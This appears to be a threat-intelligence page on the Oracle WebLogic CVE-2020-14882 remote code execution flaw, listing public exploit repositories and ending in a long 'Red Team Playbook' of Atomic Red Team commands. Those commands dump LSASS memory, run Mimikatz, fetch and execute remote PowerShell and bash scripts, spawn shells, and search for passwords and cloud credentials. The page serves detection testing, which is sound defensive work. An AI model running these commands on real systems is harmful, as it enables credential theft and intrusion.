CVE-2020-14882
Overview
This vulnerability is an unauthenticated remote code execution flaw caused by improper input validation in the Oracle WebLogic Server Administration Console component. Specifically, the Console fails to correctly handle crafted HTTP requests, allowing attackers to inject malicious commands. The root cause lies in the Console's request handling mechanism, which does not enforce sufficient access controls or sanitize input parameters, affecting multiple supported WebLogic Server versions.
Vulnerability Description
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).
Impact
An attacker with network access to the WebLogic Server can remotely execute arbitrary commands without authentication or user interaction. This enables full takeover of the affected server, including unauthorized data access, modification, or destruction, and potential lateral movement within the network. The compromise can result in complete loss of confidentiality, integrity, and availability of the WebLogic Server and its hosted applications.
Solution
Oracle has released security patches addressing this vulnerability in the October 2020 Critical Patch Update, covering affected WebLogic Server versions. Administrators should apply the updates as detailed in Oracle's advisory at https://www.oracle.com/security-alerts/cpuoct2020.html. No specific workarounds are provided; prompt patching of WebLogic Server versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, and 14.1.1.0.0 is recommended to remediate this issue.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The vulnerability present in Oracle WebLogic Server, particularly within the Console component, is characterized by its ease of exploitation and significant potential impact. This flaw allows unauthenticated attackers with network access to compromise the server through HTTP requests. The underlying issue stems from improper validation of user input, which can be manipulated to execute arbitrary code on the server. This vulnerability affects several versions of Oracle WebLogic Server, including 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, and 14.1.1.0.0. The high CVSS score of 9.8 reflects the critical nature of this vulnerability, indicating severe risks to confidentiality, integrity, and availability.
Attack vectors for this vulnerability are alarmingly straightforward. An attacker can leverage network access to send crafted HTTP requests to the WebLogic Server, exploiting the flaw without the need for authentication. This means that even individuals without prior access to the system can initiate an attack, significantly broadening the threat landscape. Once the vulnerability is successfully exploited, attackers can gain complete control over the server, potentially leading to unauthorized access to sensitive data, manipulation of server configurations, or even the deployment of malware. The simplicity of the attack process makes it particularly appealing to malicious actors, increasing the likelihood of widespread exploitation.
The real-world impact of this vulnerability can be devastating for organizations relying on Oracle WebLogic Server. Successful exploitation can lead to severe data breaches, loss of sensitive information, and disruption of services. The potential for unauthorized access to critical business systems poses a substantial risk to organizational integrity and reputation. Furthermore, the financial implications of such breaches can be significant, encompassing costs related to incident response, legal liabilities, regulatory fines, and loss of customer trust. In a landscape where data privacy regulations are becoming increasingly stringent, the ramifications of failing to secure systems against such vulnerabilities can extend far beyond immediate financial losses.
To detect and mitigate the risks associated with this vulnerability, organizations should adopt a multi-faceted approach. Regularly updating and patching affected versions of Oracle WebLogic Server is paramount, as vendors typically release security updates to address known vulnerabilities. Implementing robust network security measures, such as firewalls and intrusion detection systems, can help to monitor and control access to the server, reducing the likelihood of unauthorized exploitation. Additionally, organizations should conduct regular security assessments and penetration testing to identify potential vulnerabilities within their systems proactively. Employee training on security best practices can also enhance awareness and preparedness against social engineering tactics that may accompany such attacks.
In conclusion, the vulnerability within Oracle WebLogic Server represents a critical security concern that demands immediate attention from organizations utilizing this platform. The ease of exploitation, coupled with the severe potential impacts, underscores the necessity for proactive security measures. By prioritizing timely updates, enhancing network defenses, and fostering a culture of security awareness, organizations can significantly mitigate the risks associated with this vulnerability and protect their critical assets from potential compromise.
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2020-14882, reflected by a significant increase in telemetry activity. This surge coincides with the continued availability and refinement of multiple publicly accessible proof-of-concept exploit tools, which have gained traction within attacker communities. The proliferation of these tools lowers the barrier to entry for threat actors, enabling a broader range of adversaries to attempt compromise without requiring advanced skills. Although the EPSS score remains high and stable, the uptick in exploitation attempts signals an elevated operational tempo that defenders must acknowledge. This development intensifies the threat landscape surrounding Oracle WebLogic Server, reinforcing the criticality of this vulnerability as a persistent and actively exploited risk. Consequently, the overall threat level should be considered heightened, emphasizing the need for vigilant monitoring and response capabilities.
Update 2 — July 17, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2020-14882, with telemetry indicating a significant increase in adversary activity leveraging publicly available proof-of-concept tools. This surge reflects a growing operational tempo among threat actors, potentially lowering the barrier for less sophisticated attackers to execute remote code execution against vulnerable Oracle WebLogic Server instances. Although the EPSS score remains near maximum and stable, the increased frequency and diversity of exploitation attempts underscore an intensifying threat environment. Consequently, the risk level associated with this vulnerability has risen, signaling a heightened likelihood of successful compromises and emphasizing the urgency for defenders to maintain robust detection and response postures.
Update 3 — August 02, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2020-14882, with our telemetry indicating a significant uptick in scanning and attack activity against vulnerable Oracle WebLogic Server instances. This surge is accompanied by the emergence of additional publicly available proof-of-concept exploits, broadening the toolkit accessible to threat actors and lowering the technical barrier for exploitation. Although the EPSS score remains near its peak, the increased operational tempo reflected in our sensors suggests a more aggressive adversary posture, potentially expanding the pool of attackers capable of leveraging this critical vulnerability. This development elevates the threat level, underscoring a heightened risk of successful compromises and necessitating increased vigilance in detection and response efforts.
Affected Products (5)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Oracle | Weblogic Server | 10.3.6.0.0 |
cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*
|
|
|
Oracle | Weblogic Server | 12.1.3.0.0 |
cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:*
|
|
|
Oracle | Weblogic Server | 12.2.1.3.0 |
cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*
|
|
|
Oracle | Weblogic Server | 12.2.1.4.0 |
cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:*
|
|
|
Oracle | Weblogic Server | 14.1.1.0.0 |
cpe:2.3:a:oracle:weblogic_server:14.1.1.0.0:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
Oracle WebLogic Server Administration Console Handle RCE
exploits/multi/http/weblogic_admin_handle_rce
|
voidfyoo, Jang, wvu | Unknown | - | View |
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| Oracle WebLogic Server 12.2.1.0 - RCE (Unauthenticated) | CHackA0101 | webapps | java | - | View |
GitHub PoCs (36)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
zhzyker/exphub
Exphub[漏洞利用脚本库] 包括Webloigc、Struts2、Tomcat、Nexus、Solr、Jboss、Drupal的漏洞利用脚本,最新添加CVE-2020-14882、CVE-2020-11444、CVE-2020-1020...
|
zhzyker | 4291 | 1081 | 2020-04-01 | View |
|
jas502n/CVE-2020-14882
CVE-2020–14882、CVE-2020–14883
|
jas502n | 287 | 60 | 2020-10-28 | View |
|
GGyao/CVE-2020-14882_ALL
CVE-2020-14882_ALL综合利用工具,支持命令回显检测、批量命令回显、外置xml无回显命令执行等功能。
|
GGyao | 144 | 38 | 2020-11-03 | View |
|
s1kr10s/CVE-2020-14882
CVE-2020–14882 by Jang
|
s1kr10s | 29 | 21 | 2020-10-28 | View |
|
NS-Sp4ce/CVE-2020-14882
CVE-2020-14882/14883/14750
|
NS-Sp4ce | 19 | 9 | 2020-11-04 | View |
|
XTeam-Wing/CVE-2020-14882
CVE-2020-14882 Weblogic-Exp
|
XTeam-Wing | 17 | 8 | 2020-10-29 | View |
|
adm1in/CodeTest
CodeTest信息收集和漏洞利用工具,可在进行渗透测试之时方便利用相关信息收集脚本进行信息的获取和验证工作,漏洞利用模块可选择需要测试的漏洞模块,或者选择所有模块测试,包含CVE-2020-14882, CVE-2020-2555等,可自...
|
adm1in | 13 | 10 | 2020-12-30 | View |
|
milo2012/CVE-2020-14882
CVE-2020-14882
|
milo2012 | 8 | 9 | 2021-02-25 | View |
|
corelight/CVE-2020-14882-weblogicRCE
Detection of RCE in Oracle's WebLogic Server CVE-2020-14882 / CVE-2020-14750
|
corelight | 7 | 6 | 2020-11-12 | View |
|
qianniaoge/CVE-2020-14882_Exploit_Gui
|
qianniaoge | 0 | 13 | 2021-05-25 | View |
|
GGyao/CVE-2020-14882_POC
CVE-2020-14882批量验证工具。
|
GGyao | 12 | 1 | 2020-10-31 | View |
|
QmF0c3UK/CVE-2020-14882
|
QmF0c3UK | 7 | 5 | 2020-11-09 | View |
|
wsfengfan/cve-2020-14882
CVE-2020-14882 EXP 回显
|
wsfengfan | 7 | 4 | 2020-10-29 | View |
|
ludy-dev/Weblogic_Unauthorized-bypass-RCE
(CVE-2020-14882) Oracle Weblogic Unauthorized bypass RCE test script
|
ludy-dev | 8 | 1 | 2020-11-01 | View |
|
exploitblizzard/CVE-2020-14882-WebLogic
Check YouTube - https://youtu.be/O0ZnLXRY5Wo
|
exploitblizzard | 3 | 4 | 2021-05-10 | View |
|
xfiftyone/CVE-2020-14882
|
xfiftyone | 5 | 0 | 2020-11-12 | View |
|
kk98kk0/CVE-2020-14882
CVE-2020-14882部署冰蝎内存马
|
kk98kk0 | 3 | 2 | 2021-03-31 | View |
|
mmioimm/cve-2020-14882
|
mmioimm | 3 | 2 | 2020-11-05 | View |
|
murataydemir/CVE-2020-14882
[CVE-2020-14882] Oracle WebLogic Server Authentication Bypass
|
murataydemir | 3 | 1 | 2020-11-09 | View |
|
Ormicron/CVE-2020-14882-GUI-Test
基于qt的图形化CVE-2020-14882漏洞回显测试工具.
|
Ormicron | 2 | 1 | 2020-11-11 | View |
|
0thm4n3/cve-2020-14882
Bash script to exploit the Oracle's Weblogic Unauthenticated Remote Command Execution - CVE-2020-14882
|
0thm4n3 | 2 | 1 | 2020-10-29 | View |
|
Danny-LLi/CVE-2020-14882
This script allows for remote code execution (RCE) on Oracle WebLogic Server
|
Danny-LLi | 2 | 1 | 2023-07-17 | View |
|
pwn3z/CVE-2020-14882-WebLogic
|
pwn3z | 0 | 2 | 2021-01-29 | View |
|
N0Coriander/CVE-2020-14882-14883
结合14882的未授权访问漏洞,通过14883可远程执行任意代码
|
N0Coriander | 2 | 0 | 2021-07-03 | View |
|
ovProphet/CVE-2020-14882-checker
CVE-2020-14882 detection script
|
ovProphet | 1 | 0 | 2020-11-03 | View |
|
LucasPDiniz/CVE-2020-14882
Takeover of Oracle WebLogic Server
|
LucasPDiniz | 0 | 1 | 2023-11-09 | View |
|
b1g-b33f/CVE-2020-14882
PoC for testing if a target is vulnerable to RCE
|
b1g-b33f | 1 | 0 | 2025-12-10 | View |
|
alexfrancow/CVE-2020-14882
|
alexfrancow | 0 | 1 | 2020-10-30 | View |
|
VelesSecurity/CVE-2020-14882-WebLogic-Analysis
Technical analysis and clean Java Thread Echo PoC for Oracle WebLogic Server vulnerability chain.
|
VelesSecurity | 0 | 0 | 2026-08-18 | View |
|
BabyTeam1024/CVE-2020-14882
|
BabyTeam1024 | 0 | 0 | 2020-11-17 | View |
|
Root-Shells/CVE-2020-14882
CVE-2020-14882 rewritten in PowerShell
|
Root-Shells | 0 | 0 | 2023-04-28 | View |
|
nik0nz7/CVE-2020-14882
|
nik0nz7 | 0 | 0 | 2023-04-11 | View |
|
xMr110/CVE-2020-14882
|
xMr110 | 0 | 0 | 2024-02-04 | View |
|
KKC73/weblogic-cve-2020-14882
This is a repository that aims to provide research material on CVE-2020-14882 as part of a project in partial fullfilmen...
|
KKC73 | 0 | 0 | 2025-01-17 | View |
|
zesnd/CVE-2020-14882-POC
|
zesnd | 0 | 0 | 2024-12-21 | View |
|
AleksaZatezalo/CVE-2020-14882
|
AleksaZatezalo | 0 | 0 | 2024-12-26 | View |
Threat Feed
29 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability (129 known victims)
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Public exploit code is available for this vulnerability
Proof-of-concept code is publicly available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Deployed role: Linux · Web Server
Kill chain derived from the ML classifier. Pick the target OS above to see the OS-specific path and matching playbook.
Attack Vectors ML
MITRE ATT&CK Techniques (10)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
108 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
"#{procdump_exe}" -accepteula -mm lsass.exe #{output_file}
$exePath = resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
& "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"
PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
try{ IEX (IWR 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1003.001/src/Out-Minidump.ps1') -ErrorAction Stop}
catch{ $_; exit $_.Exception.Response.StatusCode.Value__}
get-process lsass | Out-Minidump
"#{procdump_exe}" -accepteula -ma lsass.exe #{output_file}
C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).id $env:TEMP\lsass-comsvcs.dmp full
"#{dumpert_exe}"
#{xordump_exe} -out #{output_file} -x 0x41
if (Test-Path -Path "$env:SystemRoot\System32\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\System32\rdrleakdiag.exe"
} elseif (Test-Path -Path "$env:SystemRoot\SysWOW64\rdrleakdiag.exe") {
$binary_path = "$env:SystemRoot\SysWOW64\rdrleakdiag.exe"
} else {
$binary_path = "File not found"
exit 1
}
$lsass_pid = get-process lsass |select -expand id
if (-not (Test-Path -Path"$env:TEMP\t1003.001-13-rdrleakdiag")) {New-Item -ItemType Directory -Path $env:TEMP\t1003.001-13-rdrleakdiag -Force}
write-host $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
& $binary_path /p $lsass_pid /o $env:TEMP\t1003.001-13-rdrleakdiag /fullmemdmp /wait 1
Write-Host "Minidump file, minidump_$lsass_pid.dmp can be found inside $env:TEMP\t1003.001-13-rdrleakdiag directory."
"#{venv_path}\Scripts\pypykatz" live lsa
#{mimikatz_exe} "sekurlsa::minidump #{input_file}" "sekurlsa::logonpasswords full" exit
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
"#{psexec_exe}" #{remote_host} -accepteula -c #{command_path}
cmd.exe /Q /c #{command_to_execute} 1> \\127.0.0.1\ADMIN$\#{output_file} 2>&1
New-PSDrive -name #{map_name} -psprovider filesystem -root \\#{computer_name}\#{share_name}
cmd.exe /c "net use \\#{computer_name}\#{share_name} #{password} /u:#{user_name}"
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute -ErrorAction Stop
Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation #{encoded_arguments_param_variation} -Execute -ErrorAction Stop
# creating a custom nslookup function that will indeed call nslookup but forces the result to be "whoami"
# this would not be part of a real attack but helpful for this simulation
function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'"
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds"
$url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr
Add-Content -Path #{ads_file} -Value 'Write-Host "Stream Data Executed"' -Stream 'streamCommand'
$streamcommand = Get-Content -Path #{ads_file} -Stream 'streamcommand'
Invoke-Expression $streamcommand
powershell.exe -e #{obfuscated_code}
# Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team""
reg.exe add "HKEY_CURRENT_USER\Software\Classes\AtomicRedTeam" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))
$malcmdlets = #{Malicious_cmdlets}
foreach ($cmdlets in $malcmdlets) {
"function $cmdlets { Write-Host Pretending to invoke $cmdlets }"}
foreach ($cmdlets in $malcmdlets) {
$cmdlets}
New-PSSession -ComputerName #{hostname_to_connect}
Test-Connection $env:COMPUTERNAME
Set-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use -Value "T1086 PowerShell Session Creation and Use"
Get-Content -Path $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
Remove-Item -Force $env:TEMP\T1086_PowerShell_Session_Creation_and_Use
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
iex(iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/d943001a7defb5e0d1657085a77a0e78609be58f/Privesc/PowerUp.ps1 -UseBasicParsing)
Invoke-AllChecks
powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText"
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX"
C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()"
import-module "PathToAtomicsFolder\..\ExternalPayloads\SharpHound.ps1"
try { Invoke-BloodHound -OutputDirectory $env:Temp }
catch { $_; exit $_.Exception.HResult}
Start-Sleep 5
write-host "Remote download of SharpHound.ps1 into memory, followed by execution of the script" -ForegroundColor Cyan
IEX (New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1');
Invoke-BloodHound -OutputDirectory $env:Temp
Start-Sleep 5
#{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}
#{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
ldapdomaindump -u #{username} -p #{password} #{target_ip} -o /tmp/T1087
ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub -a always -z 1000 dn
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
Invoke-Expression "#{adrecon_path}"
([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
net user administrator /domain
(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] OU Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
net user /domain
net group /domain
net user /domain
get-localgroupmember -group Users
get-aduser -filter *
query user /SERVER:#{computer_name}
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
Get-ADComputer #{hostname} -Properties *
Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *
Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" *
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$target = $env:LOGONSERVER
$target = $target.Trim("\\")
$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
generaldomaininfo -noninteractive -consoleoutput
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
